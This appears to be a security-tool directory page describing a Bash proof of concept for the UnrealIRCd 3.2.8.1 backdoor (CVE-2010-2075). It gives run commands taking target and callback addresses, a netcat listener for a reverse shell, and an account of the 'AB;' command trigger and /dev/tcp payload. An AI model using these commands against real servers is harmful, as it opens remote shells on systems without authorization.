Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2010-2075 — CVE-2010-2075 exploit | Kitploit
Tools/GitHubGitHub/tc-xonor/cve-2010-2075
ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development
GitHubtc-xonor/cve-2010-2075

CVE-2010-2075

CVE-2010-2075 exploit

View Repository
124 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2010-2075 - UnrealIRCd 3.2.8.1 Backdoor (Bash PoC)

Description

Bash PoC for the backdoor introduced in the UnrealIRCd 3.2.8.1 source tarball. The compromised binary executes arbitrary commands prefixed with AB; sent to the IRC port.

Usage

root@kitploit:~
chmod +x exploit.sh
./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>

Example:

root@kitploit:~
./exploit.sh 192.168.1.10 6667 192.168.1.20 4444

Set up a listener before running:

root@kitploit:~
nc -lvnp 4444

How it works

The backdoor checks incoming data for the prefix AB; and passes the rest to the system shell. The payload sends a bash reverse shell via /dev/tcp.

Affected versions

  • UnrealIRCd 3.2.8.1 (trojanized tarball, November 2009 - June 2010)

References

  • https://nvd.nist.gov/vuln/detail/CVE-2010-2075
  • https://www.unrealircd.org/txt/unrealsecadvisory.20100612.txt

Disclaimer

For educational and authorized testing only.

Download Tool